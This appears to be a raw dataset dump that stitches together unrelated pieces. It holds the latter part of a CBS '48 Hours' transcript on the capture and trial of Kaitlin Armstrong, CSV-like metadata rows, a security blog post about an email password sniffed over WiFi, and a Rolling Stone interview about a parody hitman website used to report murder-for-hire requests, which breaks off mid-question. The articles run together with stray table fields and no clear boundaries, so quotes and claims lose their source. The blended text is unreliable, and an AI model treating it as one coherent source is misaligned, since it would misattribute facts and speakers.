**Jonathan Vigliotti**: I hear timeline and I hear the pressure is on —
**Deputy U.S. Marshal Damien Fernandez**: Pressure's on. I know we were sitting in the plane and we're talking, what's the game plan?
Although they would have help from the Costa Rican authorities and U.S. State Department officers on the ground, they knew finding Armstrong was going to be a big challenge.
**Deputy U.S. Marshal Emir Perez**: We had other intelligence indicating that … she was staying in hostels in Costa Rica. And I don't know if you know anything about Costa Rica, but Costa Rica has a lot of hostels, a lot, an unbelievable amount of hostels.
The U.S. Marshals wouldn't tell "48 Hours" exactly how their intelligence gathering worked, but their team back in the States had managed to track down the phone number for an American businessman they believed had connected with Armstrong at some point.
**Det. Marc McLeod**: We didn't know what city he was in. So we decided, hey, let's just cold call him. … So we call him. And we're on the conference room and he answers. And we're like, "Hey, it's the U.S. Marshals. My name is Marc." And he goes, "I don't want any," click just hangs up. Like it's a — like a —
**Jonathan Vigliotti**: A telemarketer.
**Det. Marc McLeod**: Yeah. A telemarketer.
**Det. Jonathan Riley**: Right. Or a scam call.
After three or four call attempts, the businessman finally stayed on the line to answer the U.S. Marshals' questions.
**Det. Marc McLeod**: And we actually ended up sending a picture of Kaitlin … while we're on the phone with him. He looks at it and he goes, yes, but she doesn't look like that and she's not using that name.
**Jonathan Vigliotti**: And did he tell you her new name?
**Det. Marc McLeod**: He did.
**Det. Jonathan Riley**: It was Beth.
**Det. Marc McLeod**: Beth.
**Det. Jonathan Riley**: She was going by Beth.
**Jonathan Vigliotti**: Going by Beth.
And the businessman said Armstrong no longer looked like her photo. She had cut her hair and changed its color.
**Det. Jonathan Riley**: It was brown hair instead of red.
**Emir Perez**: Yeah, she dyed her hair.
The businessman told the U.S. Marshals he had no idea that the woman who called herself Beth was actually Kaitlin Armstrong, but he did tell them where they might find her.
**Det. Marc McLeod:** He's like, "Well, I met her at a yoga studio in Jacó."
Jacó is a popular tourist destination known for its nightlife and its beaches and the perfect place to hide. It was the U.S. Marshals' first real tip, so they rushed there.
They canvassed the area, combed through hours of surveillance video, but could not find a single sign of Kaitlin Armstrong anywhere. It was a bust.
**Chris Godsick**: … but the Marshals have one more solid lead and that takes them to a beautiful touristy beach town— a one-street town called Santa Teresa.
## WAS KAITLIN ARMSTRONG HIDING IN PLAIN SIGHT?
One month after Kaitlin Armstrong disappeared, the U.S. Marshals were in hot pursuit of her in another area of Costa Rica. A source had suggested she might have gone to a small village on the Pacific coast.
The U.S. Marshals took a ferry to reach a remote peninsula. Once there, they drove by car through mountains to the tiny town of Santa Teresa. But when they finally arrived, they ran into an unexpected problem.
**Jonathan Vigliotti**: … you get to Santa Teresa. … Was it easy to identify her there from the other people that were there?
**Deputy U.S. Marshal Damien Fernandez**: I think from the get-go we were told … you're gonna be in for a surprise 'cause a lot of the women in Santa Teresa look just like Kaitlin — a lot of them.
And it turns out, that advice was right. The town was full of foreign tourists. Deputy U.S. Marshals Fernandez and Perez arrived in Santa Teresa after dark.
**Deputy U.S. Marshal Emir Perez**: So, we get there, and he starts walking down a main strip that's there, uh, like down the street.
**Deputy U.S. Marshal Damien Fernandez**: There's only one road on — on that town.
**Deputy U.S. Marshal Emir Perez**: And he sees —
**Deputy U.S. Marshal Damien Fernandez**: Main road.
**Deputy U.S. Marshal Emir Perez**: He sees a girl and he says, you know, that looks just like her. Well, a couple minutes later, we see another one. And it's late at night and we're like, whoa, oh, man, that's two. … And then there's another one.
As the U.S. Marshals tried to find Armstrong, they even had one of their female operatives start going to yoga classes to see if they could spot her.
**Deputy U.S. Marshal Damien Fernandez**: She actually did three different classes for us.
And they tapped into local contacts.
**Deputy U.S. Marshal Damien Fernandez**: Oh, yeah. We made friends with people there that would send us pictures. Oh look, I — I think I saw her at this restaurant yesterday and she's in the back in the background of a photo that I took, stuff like that.
In fact, people had seen Armstrong at local spots in Santa Teresa, but they didn't realize who she was. Armstrong was hiding in plain sight using different names.
**Jonathan Vigliotti**: She had like multiple names.
**Greg Haber**: Yeah. Um, she came in —
**Man in restaurant**: Beth?
**Greg Haber**: Um —
**Jonathan Vigliotti** Beth?
**Greg Haber**: It wasn't Beth.
**Woman in restaurant**: Ari?
**Greg Haber**: Ari.
**Jonathan Vigliotti**: Ari.
**Greg Haber**: Ari, right. So she came in as Ari.
Greg Haber is an American from the New York area who owns a restaurant called Kooks Smokehouse and Bar in Santa Teresa.
**Jonathan Vigliotti**: Ari. What did Ari look like? Did she stand out to you?
**Greg Haber**: Pretty, came in, um, you know, introduced herself as a yoga teacher, which is basically anybody else down here … "hey, I moved here, teaching yoga down the street" ... and that was it.
**Jonathan Vigliotti**: What was her general vibe like?
**Greg Haber**: She definitely seemed like she was trying to establish roots here. Like this was gonna be her new home.
And Haber says one day he noticed something different about her.
**Greg Haber**: I saw her on the beach. … I walk my dog on the beach every night for sunset. … And you're walking through, and you see the bandage on her face. It's like, "Oh, what happened?" She's like, "Oh, surfboard hit me in the face."
**Greg Haber**: It's like, well, happens to everybody, right, at least once. So, you wouldn't even question that story here. Like, you see people all the time.
Turns out that bandage would later prove to be an important part of this story — and one of the reasons the U.S. Marshals say Armstrong was so hard to find.
**Jonathan Vigliotti**: So, you're this close to giving up.
**Deputy U.S. Marshal Damien Fernandez**: Yes.
Finally, they decided on one last tactic: they turned to a local Facebook page.
**Deputy U.S. Marshal Emir Perez**: We decided we were gonna put an ad out, for a yoga instructor and see what would happen.
**Jonathan Vigliotti**: So this is the equivalent of Craigslist.
**Deputy U.S. Marshal Emir Perez** Yes, correct. Right. Pretty much.
**Deputy U.S. Marshal Damien Fernandez**: A little bit more lively, but yes. … And just saying, hey, we're at this hostel, we're looking for a yoga instructor as soon as possible. Please contact us at this number.
But after almost a week of hunting, even that didn't seem to be working.
**Deputy U.S. Marshal Damien Fernandez**: Sunday, we decided we haven't gotten any response back from anything.
**Deputy U.S. Marshal Emir Perez**: Nothing. We're burned.
**Deputy U.S. Marshal Damien Fernandez**: So, Sunday we're like, OK, we're done. … None of 'em have panned out. So —
**Deputy U.S. Marshal Emir Perez**: We're going back to *San José*
Now back in *San José*, the U.S. Marshals were getting ready to head home when suddenly —
**Deputy U.S. Marshal Emir Perez**: We got a bite, somebody that, um, identified herself … as a yoga instructor and said they wanted to meet with us at a particular hostel … and we said … "this is, this is our chance!"
Perez and Fernandez rushed back to Santa Teresa just ahead of a tropical storm.
Tourism Police Lieutenant Juan Carlos Solano's team helped the U.S. Marshals in their search for Armstrong. They did surveillance on a hostel called "Don Jon's" where the yoga instructor — the one who answered that online ad — was believed to be.
**Jonathan Vigliotti** (to Solano in Costa Rica): So, there is this massive international manhunt, and of all places in the world, it ends in this very discreet hostel.
**Lt. Juan Carlos Solano**: Sí, aquí se ubicó, ella estaba hospedada acá. (*Translation: Yes, this is where she was staying, she was staying here*.)
It was now time for the U.S. Marshals to make their move.
They decided that Deputy U.S. Marshal Perez would approach the woman alone. They didn't want to scare her off. He would pretend to be a tourist and try to get a really good look at her face.
**Deputy U.S. Marshal Emir Perez**: So I walked up … and I got in. And I saw two individuals sitting there at a table, off to the left, as soon as I walked in.
He says one was a woman.
**Deputy U.S. Marshal Emir Perez**: She looked like Kaitlin, but not 100 percent. … So I thought, well, how can I approach her or get close enough where I start asking questions where she doesn't suspect something. So, I decided that I was gonna speak to her in Spanish. So I spoke to her in nothing but Spanish.
**Jonathan Vigliotti**: So, you're communicating, she goes to use her phone for Google Translate and then –
**Deputy U.S. Marshal Emir Perez**: So, I got a little closer 'cause I saw that she was trying to get to Google Translate on her phone and she'd raised it up to me and I got even closer. … And I noticed that she had a bandage on her nose and possibly her lips were swollen. And I saw her eyes … The eyes are the exact same ones that I saw in the picture. And this is her 100 percent.
**Deputy U.S. Marshal Damien Fernandez**: He gets in the car, and he is like, "That's her. She's in there."
Local police moved in to make the actual arrest. And soon the U.S. Marshals discovered why Armstrong had been so hard to find: she had been getting plastic surgery when they first arrived in Santa Teresa.
At the hostel, they found a receipt.
**Damien Fernandez**: The receipt for surgery.
**Jonathan Vigliotti**: Plastic surgery?
**Damien Fernandez**: Plastic surgery.
In side-by-side photos, you can see that Armstrong changed the shape of her nose. The Deputy Marshals said their female operative — the woman they sent to yoga classes to try and find Armstrong — told them Armstrong's new look would have tricked her.
**Deputy U.S. Marshal Damien Fernandez**: She told me, I think if I would've run into her at the yoga studio doing yoga classes, I don't think I would've recognized her.
**Jonathan Vigliotti**: Wow. It almost worked.
**Deputy U.S. Marshal Damien Fernandez**: It almost worked.
## THE CASE AGAINST KAITLIN ARMSTRONG
The U.S. Marshals took Armstrong back to Texas, where she was charged and held in jail. But just weeks before she was due to stand trial for the murder of Moriah Wilson, Armstrong escaped from custody again.
**Pilar Melendez**: She was at a doctor's appointment and tried to escape as they were walking out.
Pilar Melendez from the Daily Beast says Armstrong didn't get far before deputies caught her.
**Pilar Melendez**: It was pretty astonishing that she did that given the fact that she had tried to escape prosecution prior.
**D.A. José Garza**: This was just more evidence of her guilt.
José Garza is Travis County's district attorney. He says his team of prosecutors — Rickey Jones and Guillermo Gonzalez — were more than ready to try the case.
**D.A. José Garza**: When we learned that she had tried to escape, it just added to our confidence level in the facts of this case … that we would be able to secure justice for Moriah and her family.
On Nov. 1, 2023, Armstrong's trial began.
RICKEY JONES | Prosecutor (opening statement): The last thing Mo did on this earth was scream in terror.
In opening statements, Jones told the jury about chilling audio from a security camera that captured the last moments of Moriah Wilson's life.
RICKEY JONES (opening statement): Those screams are followed by "pow! pow!" Two gunshots. … Kaitlin Armstrong stood over Mo Wilson and put a third shot. Right into Mo's heart.
Prosecutors said Armstrong had been tracking Wilson by using a sports app.
**Pilar Melendez**: Kaitlin, prior to the murder, had been following Mo on the Strava app, which is basically an app that athletes use to track their miles, running, biking … And she knew exactly where she was.
And they said that Armstrong, on the night of the murder, was most likely tracking Colin Strickland, as well.
**Guillermo Gonzalez | Prosecutor**: She did have the ability to monitor his communications. She had access to all of his passwords. She had access to his Instagram account.
**Rickey Jones**: I believe that when Mo sent Colin a text letting him know the address where she was. I believe that Kaitlin Armstrong was at home on Colin Strickland's laptop. … She saw that message.
Jones told the jury that after murdering Wilson and before leaving the scene, Armstrong took Wilson's bike and discarded it in the bushes just yards away from where her Jeep was parked.
**Rickey Jones**: Our belief is that she maybe staged it to look like a robbery or something. Or, another theory is, Mo Wilson's bike is a tool of her trade. It might have been like the bullet shot in the heart. I'm going to shoot you in the heart. I'm going to throw away your bike.
But they said Armstrong made one big mistake: she left her DNA behind on the handlebars and seat of Wilson's bike. And that's not all the evidence prosecutors had against Armstrong. There was that receipt that showed Armstrong had received plastic surgery while hiding out in Costa Rica.
**Rickey Jones**: Everything she does … it's all consistent with trying to evade the authorities.
But when it was the defense's turn, attorney Geoffrey Puryear told the jury there was no direct evidence — including security footage — that actually showed Armstrong was at the scene of the crime.
GEOFFREY PURYEAR (in court): Not one witness saw Kaitlin Armstrong allegedly commit this murder.
Then why would Armstrong flee and hide from authorities? Defense attorney Rick Cofer pointed the finger at Colin Strickland.
RICK COFER (in court): Was she scared? What do you think? Do you think that she may have been concerned a little bit that her boyfriend had killed someone? … Fear results in fight or flight and it was flight.
But Jones said, there was a big problem with this theory because Strickland had nothing to do with the murder of Wilson.
**Rickey Jones**: In fact, at the time of the murder, he was actually on the phone speaking with someone. … it wasn't Colin Strickland.
Armstrong's defense team did not respond to "48 Hours"' request for an interview.
After a two-week trial, it took the jury around two hours to decide Armstrong's fate.
JUDGE (reading verdict): We the jury find the defendant Kaitlin Armstrong guilty of the offense of murder …
**Rickey Jones**: As a prosecutor, the first row right behind you is the family … you began to feel their pain and their desire for a just outcome for their loved ones.
One day after her conviction, Armstrong was sentenced to 90 years behind bars.
But before the case came to an end, Judge Brenda Kennedy allowed Caitlin Cash — Wilson's close friend whose apartment she had been staying at and who had found Moriah's body – to take the stand and speak directly to Armstrong.
CAITLIN CASH (in court): So many people in this room have lost so much. … I'm angry at you, at the utter tragic nature, at the senselessness at not being able to hear Mo's voice again. … I feel deep sadness for the road ahead.
Then it was Moriah Wilson's mother's turn.
KAREN WILSON (in court): I hate what you did to my beautiful daughter. It was very selfish and cowardly that violent act on May 11th. It was cowardly because you never chose to face her woman-to-woman in a civil conversation. She would've listened. She was an amazing listener. She would have cared about your feelings.
But despite the pain, Karen Wilson closed with words of love and optimism, because she said that's how Moriah would have wanted it.
KAREN WILSON (in court): You killed her earthly body, but her spirit is so very much alive, and you can never change that.
Today in Kingdom Trails in northern Vermont, a place that was sacred to Wilson, a trail was built in her honor. It's called "Moriah's Ascent."
**Lisa Gosselin Lynn**: Moriah was a Vermonter. She was giving. She was hardworking. She was honest. She was caring. And she came from a wonderful family. And that family really wants that legacy and all of her good qualities to inspire others …
*To honor Moriah, the Wilson family created the **Moriah Wilson Foundation** that promotes healthy living and community building.*
## "48 Hours" Post Mortem podcast
Host Anne-Marie Green, correspondent Jonathan Vigliotti and "48 Hours" field producer Hannah Vair take you inside the case.
*Produced by Chuck Stevenson and Chris Ritzen. Hannah Vair is the field producer. Alicia Tejada is the coordinating producer. Ryan Smith, Jenna Jackson and Cindy Cesare are the development producers. Matthew Mosk is the senior investigative editorial director. Wini Dini, Mike Baluzy, Grayce Arlotta-Berner and Joan Adelman are the editors. Lourdes Aguiar is the senior producer. Nancy Kramer is the executive editor. Judy Tygard is the executive producer.* | true | true | true | When cyclist Anna Moriah "Mo" Wilson was murdered in Texas, U.S. Marshals assigned to the case used a unique tactic to track down her suspected killer in Costa Rica and bring the fugitive to justice. | 2024-10-12 00:00:00 | 2024-01-27 00:00:00 | newsarticle | cbsnews.com | CBS News | null | null |
|
7,191,047 | http://eamann.com/tech/inbox-remove-jquery/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,725,493 | http://blogs.wsj.com/digits/2014/12/09/soundclouds-valuation-could-top-1-2-billion-with-new-fundraising/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,144,410 | https://medium.springboard.com/the-essential-guide-to-a-stellar-design-portfolio-1913df89ada7 | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
11,746,523 | http://blog.erratasec.com/2016/05/technology-betrays-everyone.html | Technology betrays everyone | Robert Graham | The same thing happened to me at CanSecWest around the year 2001, for pretty much exactly the same reasons. I think it was HD Moore who sniffed my email password. The thing is, I'm an expert, who writes tools that sniff these passwords, so it wasn't like I was an innocent party here. Instead, simply opening my laptop with Outlook running in the background was enough for it to automatically connect to WiFi, then connect to a POP3 server across the Internet. I thought I was in control of the evil technology -- but this incident proved I wasn't.
By 2006, though, major email services were now supporting email wholly across SSL, so that this would no longer happen -- in theory. In practice, they still left the old non-encrypted ports open. Users could secure themselves, if they tried hard, but they usually weren't secured.
Today, in 2016, the situation is much better. If you use Yahoo! Mail or GMail, you don't even have the option to not encrypt -- even if you wanted to. Unfortunately, many people are using old services that haven't upgraded, like EarthLink or Network Solutions. These were popular services during the dot-com era 20 years ago, but haven't evolved since. They spend enough to keep the lights on, but not enough to keep up with the times. Indeed, EarthLink doesn't even allow for encryption even if you wanted it, as an earlier story this year showed.
My presentation in 2006 wasn't about email passwords, but about all the other junk that leaks private information. Specifically, I discussed WiFi MAC addresses, and how they can be used to track mobile devices. Only in the last couple years have mobile phone vendors done something to change this. The latest version of iOS 9 will now randomize the MAC address, so that "they" can no longer easily track you by it.
The point of this post is this. If you are thinking "surely my tech won't harm me in stupid ways", you are wrong. It will. Even if it says on the box "100% secure", it's not secure. Indeed, those who promise the most often deliver the least. Even those on the forefront of innovation (Apple, Google, and Facebook) must be treated with a healthy dose of skepticism.
So what's the answer? Paranoia and knowledge. First, never put too much faith in the tech. It's not enough, for example, for encryption to be an option -- you want encryption enforced so that unencrypted is not an option. Second, learn how things work. Learn why SSL works the way it does, why it's POP3S and not POP3, and why "certificate warnings" are a thing. The more important security is to you, the more conservative your paranoia and the more extensive your knowledge should become.
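As a concrete exercise (this command and hostname are just an illustration, not something from the original incident), you can look at the certificate a POP3S server presents and whether it verifies:

```
# Connect to the POP3S port (995) and print the server's certificate chain
openssl s_client -connect pop.example.com:995 -servername pop.example.com -showcerts
```

If openssl reports a verify error for that connection, that's the same condition a browser-style "certificate warning" is complaining about.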
**Appendix**: Early this year, the EFF (Electronic Frontier Foundation) had a chart of various chat applications and their features (end-to-end, open-source, etc.). On one hand, it was good information. On the other hand, it was bad, in that it still wasn't enough for the non-knowledgeable to make a good decision. They could easily pick a chat app that had all the right features (green check-marks across the board), but still be one that could easily be defeated.
Likewise, recommendations to use "Tor" are perilous. Tor is indeed a good thing, but if you blindly trust it without understanding it, it will quickly betray you. If your adversary is the secret police of your country cracking down on dissidents, then you need to learn a lot more about how Tor works before you can trust it.
**Notes:** I'm sorta required to write this post, since I can't let it go unremarked that the same thing happened to me -- even though I know better.
## 2 comments:
Even with modern email encryption technology still betrays us.
Many mobile applications fail to verify the servers certificate allowing seamless man in the middle interception of data even an informed user would assume was safely encrypted.
It frustrates the hell out of me when I go to set up an account on some site and their password "requirements" are piss poor. Like they have a short maximum length or they don't support special characters. There's only so much you can do even when you know what is out there and best practices. I just had to set a password for a work-related benefit, someone that has my SSN and all my medical information aaaaand no special characters and 12 character max length. Of course, all these betrayals are really the result of decisions made by the people we trust to protect our information. Poor implementations, mis-configuration, and security as a second or third thought to implementing the latest features. Technology is morally neutral, people betray us.
29,393,153 | https://www.rollingstone.com/culture/culture-features/rent-a-hitman-wendy-wein-murder-for-hire-sting-operation-1066756/ | How a Fake Rent-a-Hitman Site Became an Accidental Murder-for-Hire Sting Operation | Ej Dickson | # How a Fake Rent-a-Hitman Site Became an Accidental Murder-for-Hire Sting Operation
A few months ago, a 51-year-old woman from Michigan named Wendy Wein sent an email to a man she believed was named Guido Fanelli, the proprietor of a website called Rent-A-Hitman.com. “Got A Problem That Needs Resolving? With Over 17,985 U.S. Based Field Operatives, We Can Find A Solution Thats Right For You!” the website promised, along with a badge touting the site’s HIPPA compliance. Wein, indeed, had a problem that needed resolving: as she recounted in her email to Fanelli, there was a man who had ripped her off for $20,000 (her ex-husband, as authorities later discovered), and she wanted him taken care of. “I prefer not going jail. Thank you for your time,” the email concluded.
There was a small problem with this request. Guido Fanelli was not actually Guido Fanelli but Bob Innes, a repo-man in the Bay Area and the owner of Rent a Hitman, a website that has been used at least a dozen times to ensnare would-be assailants. Had Wein been paying attention, she would’ve noticed a few red flags that the site was not real: the fact that “HIPPA” stands for “Hitman Information Privacy and Protection Act of 1964,” for instance, or the section promising group and senior discounts. (The fact that the website openly offers the services of killers-for-hire is also a pretty significant tell). Nonetheless, these key facts eluded her, and as soon as she reached out to Innes, he alerted the authorities, who placed her under arrest; she was charged with solicitation to commit murder and illegal use of a computer to commit a crime, and is currently awaiting trial. (According to Monroe County first district courthouse records, her case is still pending, and her next hearing is scheduled for October 21st. Her court-appointed attorney did not respond to a request for comment.)
News of RentAHitman.com and the woman dumb enough to fall for it went semi-viral when it was reported last July, but *Rolling Stone *wanted to learn more about Innes’s operation and how, precisely, the website works. So we reached out via — what else? — the Rent a Hitman website, where “Guido Fanelli” responded immediately. We spoke to Innes about the origins of the site (“I really didn’t think that people were gonna be that stupid. Boy, did they show me,” he says), why Indonesians love murder-for-hire plots, and why you should be very, very careful when hiring a babysitter.
*This interview has been condensed and edited for clarity.*
**Can you start by telling me: Who are you?
**My name is Bob Innes. I’m an IT guy with a passion for being a kitchen detective, I guess you might say. In 1999, I went through the Napa Valley Police Academy, I graduated the police academy there with the ambition of going into law enforcement. I had applied at several agencies throughout the Bay Area here in California. And then in the following years, California had hiring freezes and budget cuts. All the positions were pretty much gone at that point. That’s when I started driving limousines to make some income while I would continue to look for a real job. I decided, well, it’s time to retool and find a profession that is always gonna be there. So in 2003, I enrolled in a business trade school in Northern California called Empire College. I went into IT, and took a program of information technology with an emphasis on the security aspect of it.
**What was the genesis of the Rent-a-Hitman domain name?
**One of the courses that I was taking was a penetration testing and risk analysis type course. Basically, you would try and penetrate a network and find out what the vulnerabilities of the network are, and would then work to patch up those vulnerabilities so it strengthens the network. There were a couple of my friends in that class, and we decided we wanted to start a business doing the penetration testing. One Sunday, we were playing paintball, and we were discussing business plans and a name for the particular company. And I came up with “Rent-A-Hitman.” Rent as in, hire us. Hit as in visitor traffic, analytics, and that kind of thing. It just sounded good. It was a play on words. So that was in February of ’05. And after graduation right around June, a couple of the guys ended up going to work for a different company. They moved out of state. I was left holding the domain name and trying to auction it off, but really there weren’t any buyers for that.
**How much did it cost, that domain?
**I have a receipt, it’s $9.20. That was February 5th, 2005.
*So after several months, I put the domain up for auction on one of the Web sites. I also put a simple little splash page, a little graphic that I made that said, ‘This domain is for sale. If interested, contact at RentAHitman.com’ with the email address. After about six, eight months of trying to auction it off, I wasn’t getting any serious buyers, no serious inquiries, so I decided to just hold on to it. About two and a half years later, I go into the inbox just to kind of clean it up and see what mail is in there, and to kind of revisit if somebody wants to buy it. Well, I was simply shocked when I saw the 250 to 300 emails in the account or in the inbox from people around the world that were seeking various services. Some of these emails were from people looking for asset extraction, to get money out of, like an individual or a bank or something. “How much to perform a hit in Austria? Do you service minors? Are you hiring?” One in particular was a lady out of the U.K. who was looking for a date. She wanted to have a hit man companion and learn the trade.*
**Prior to that, had you at any point realized that anybody might take the domain seriously?
**I really didn’t think that people were gonna be that stupid. Boy, did they show me. You always heard stories, even back then of people on the Dark Web going to find a hitman, and there was always Silk Road and all these other sites. But you never really heard of anybody doing it on the surface web. So I thought, you know, ‘Nobody’s really going to mess with this. Nobody is going to take it seriously.’ It was not my intention to set up a snare for some people.
**What was the first serious inquiry you got?
**It was from a female by the name of Helen. She was out of the U.K. but stranded in Canada. She had written an email to the contact email address, and it basically just it was a long and rambling email saying how she was screwed out of her father’s inheritance by three family members. She has no money. She has no place to live. She is stranded in Canada without a passport, so she can’t even leave. She wanted retaliation against her aunt, uncle, and one other family member. She provided physical addresses and whatnot. So when I first received that e-mail, I was helping my brother move from L.A. back up here to the Bay Area, so I was loading a U-Haul truck full of his belongings. I didn’t really take the time to read Helen’s e-mail in-depth. I just thought, this is a troubled person. I really didn’t give it much thought. Then she sends a second e-mail with “Urgent” in the subject line with more detail, more corroborating information. And I responded to that e-mail and I asked two simple questions. “Do you still require our services? Would you like me to put you in contact with the field operatives?”
**Why was that your immediate response?
**Because I could tell that this person was in a bad place. She obviously was serious about causing harm to people overseas. Her email was long and rambling and with great detail. This is a person that was in desperate need… The other emails, they were basically one line emails to the e-mail account, and there wasn’t a lot of information to go off of. Nobody was leaving names or addresses or anything like that. These were people just kind of feeling the water. And I didn’t respond, so they kind of just went away with this. This Helen email, I knew just reading her first e-mail that this is a person who wanted to have these people murdered. There was no doubt in my mind that was her intent. She responded back and said, yes, I’m staying at this hostel in Canada. Mind you, I’m driving up I-5 with a U-Haul full of stuff, and I have all these thoughts going through my head. “What am I getting myself into? You know, this lady is serious. I need to go home and start Googling and researching this.” So I did just that when I got home. I started printing out about 20 pages of details, names and addresses and Google satellite images and and all of the information was corroborated.
At that point, that’s when I went to the local police department and spoke with a friend of mine [who] at the time was a sergeant. And I told him what was going on. I gave him the information. He reached out and contacted the police department that had jurisdiction. They went out and they did a welfare check on this person to make sure that she was OK. And during the course of their investigation, they found out she was wanted out of U.K. on extraditable warrants for serious charges. So she was taken into custody. She spent 126 days in Canada before being extradited back to the U.K.
**Why did you automatically assume that this was a person who was serious about committing murder?
**If I didn’t get the email, somebody else would have got the email and taken different action. This was one of those extenuating circumstances that just had to be addressed. This was definitely a threat towards three people. So if I didn’t act, in my opinion, somebody else may have. And the results would have been a lot different.
**Where did the Hit Man Information Privacy and Protection Act of 1964 come from?**
In 2008, two years before I got this Helen request, I started working for an I.T. company, and we performed data recovery for public and private homeowners and businesses and governments and medical offices. And part of the requirements for performing data recovery for a medical facility is we had to maintain HIPPA compliancy. Everybody is familiar with HIPPA when you go to the doctor. So when I redesigned the website after this 2010 incident with Helen, I created a fictitious HIPPA for the Web site called the Hit Man Information Privacy and Protection Act of 1964. Now, it doesn’t mean anything. I mean, it’s purely fictitious. I also modified the Web site to include its own Web form so that people can fill out in their own words as to who, what, why, when, where they want done. There was no mention of any services, no mention of compensation or anything on the Web site. It was initially redesigned to just be so over-the-top fake, nobody could be that stupid to fill out this Web form and expect to contact a hit man. I wanted to make this Web site so glaringly obvious to the normal user that this is a parody…I wanted to make it obvious to law enforcement that, hey, this is not a real website. Yet people have gone to the Web site and solicited to have other people murdered.
**How many requests have you gotten?
**I run a spreadsheet of the requests that I’ve received. About 350 requests are on that spreadsheet. Not all of them are for murder for hire. Some of them are for people looking for assisted suicide options. Some of them are clearly hoaxes where they’re trying to prank their friend. Some of them are for people that are seeking employment, which I clearly can’t help them with. And out of the 350, about 10 percent are for those people that are seeking to cause harm to others. Now, of those, I ask the same two questions I always do. “Do you still require our services?” “Would you like me to place in contact with a field operative?” If I never hear back from them, maybe they have figured it out. Maybe they get a free pass on this one. But if they respond back with, “Yes.” OK, I’ll put you in contact with the field operatives. I’ll be your matchmaker.
**How do people find you? Like do you look at your analytics? Where do you get your traffic from?
**Most of the traffic is organic, meaning people are out there searching the Internet, Yahoo and Google and Bing and whatever, looking for a hit man. I’m not advertising the website anywhere. It’s clearly been picked up in the media. A lot of people have seen news stories on it. But the solicitations are still coming in. I’ve had a couple last week, I had one this week.
**Can you give an example of a request that you got?
**This is a request that was out of Kansas. This was from a female, Danae Wright. She said, under services requested, “shut down and take take them out to shut up the drama.” People were talking bad about her in her small town in Oakley, Kansas. She provided three names, which I was able to verify on Facebook. She wanted them taken out using “guns, bombs or anything or any way to remove them.” She additionally stated this was an urgent request. I asked her if she required our services and wanted to be placed in contact with the field operative. She said yes. That’s when I reached out to the Oakley Police Department, who forwarded this on to the Kansas Bureau of Investigation. The female was found guilty and sentenced to three years supervised probation after admitting to criminal solicitation to commit murder in the second degree. She had profiles on childcare-for-hire Web site. She wanted to watch people’s kids.
**So you follow up with these cases, like you keep track of them.
**She’s not even really one of the bad ones. There was another kid whose name is Devon Fauber. He was out of Augusta County, Virginia. This is a 20-year-old kid who was working at a seafood fish restaurant. He was upset with his ex-girlfriend and solicited to have his ex, her mother, and her stepfather murdered. But in addition, he wanted to have his ex-girlfriend’s infant kidnaped with the birth certificate and brought from Virginia to Texas so that he could start a family with this other female. This kid was so persistent. Again, I asked the two questions. He responded right away, said, yes, this is the address. Make sure you get the job done. He was so persistent over the next 10 to 12 days: “How come the job’s not done yet? I’ve given you everything you need to know about where they can be found. Remember, don’t kill the baby.” When I reported it to the Augusta County sheriff’s deputy, he said, OK, this guy is public enemy number one. They set up a sting. They made an arrest…. This is [also] a kid who also had two profiles on child care for hire Web sites in his small town. He wanted to watch other people’s kids again. You wanted to, you know, cook and do their homework with them. This is a predator and somebody that had to be stopped. So he is currently serving out his time. [Ed. note: Fauber pleaded guilty to two charges of solicitation of murder and was sentenced to 20 years in prison with 10 years suspended.]
**Do these people pay you?**
No, when I say that I'll have a field operative contact you, that's for [law enforcement] to work out the details. When they perform the sting and when they sit down with the person, that's for them to discuss, because if there's any money brought to that little meeting, that shows intent as well. I don't discuss any of that. That would change me from a state's witness to coconspirator, and that's a road I'm not going to go down. So I have to be very cognizant and careful about not getting into any kind of conversation about that.
**So he was expecting you to have killed his girlfriend and her family without having paid you?
**Yeah, apparently. [Laughs] Maybe he had coupons or something, I don’t know.
**Do you ever call the alleged targets and let them know they're in someone's crosshairs?**
No. Once I report this information to the police, it's up to the police to make that contact. And I do that because I don't know what the full story is. I don't know if the target is somebody who is vindictive enough to take matters into their own hand and go out and kill this guy. And that's not something that I want to be weighed down with. That's above my pay grade.
**What are the most common reasons that someone wants somebody else murdered?**
It's been my experience that a lot of these are "ex-boyfriend, bad breakup, people need to move on" kind of thing. Here's one right here: [*reading from email*] "this girl has been a problem in my life for a long time. I just need someone to take her out of the picture, someone who can kidnap and capture and disarm the situation, please. Thank you."
There’s a lot of different reasons. Some are trying to get somebody removed so they can be happy with somebody else. I’ve received requests for services from people that want their teachers harmed. Maybe they don’t like their homework. A number of the requests that I had gotten have involved students under the age of 18 or schools. They’ve named academic facilities. On those particular requests, I don’t waste my time with those two questions. I’ll Google some information. I’ll find out what I can about the teacher. I’ll find out what I can about the student, find out what I can about the school. But those are automatically reported. I don’t want to play that game, in this day and age with all the school shootings and all the bullying. I get peace of mind knowing that if if the school has been named or a juvenile has been named, maybe there’s an abuse issue that is far beyond anything I can tell just from an email…maybe they need medical help, psych help or whatever.
There was a case out of Anchorage, Alaska, from a 14-year-old kid who wanted his mom, dad, brother, and sister murdered. He gave instructions and said that he sleeps downstairs and in a bunk bed and that he wanted this done quietly. As fast as possible, that was reported to the Anchorage Police Department. They went out and did a welfare check on this kid and there was a history of abuse with this particular individual. So that’s, again, an example of why I would forward those on in and get the authorities involved fast on those.
**Are they mostly from men or women?
**You know, it’s about a 60/40 split. Mostly men. And that’s that’s kind of the way it’s shaking out to be, I’m not the best person at keeping statistics on that.
**How many people have you gotten arrested?
**There’s probably been about a dozen cases that have ended up in arrest with authorities….but I do want to tell you, the website itself has been seen in over 160 countries. I’ve received a couple of hundred e-mails from people in Indonesia who are seeking to have other people murdered in that country.
**Why Indonesia?
**Somebody in Indonesia did a YouTube video and they were talking about the dark web and they mentioned my Web site by name, which caused a surge of people to go on Yahoo and Google to search Rent a Hitman. They would end up on my page and they would then send a solicitation: name, address, the target’s social media, all this information caused a real surge in solicitation activity. I took it upon myself to contact the Indonesian consulate in San Francisco. I gave them one hundred of the e-mails. The most gripping part of this whole thing is that five of those e-mails were for their own president, Joko Widodo. They were assassination requests for the Indonesian president….it’s hard to say why it happens, but it was a real problem for a long time.
**Why do you give interviews if you’re trying to catch people committing a crime?
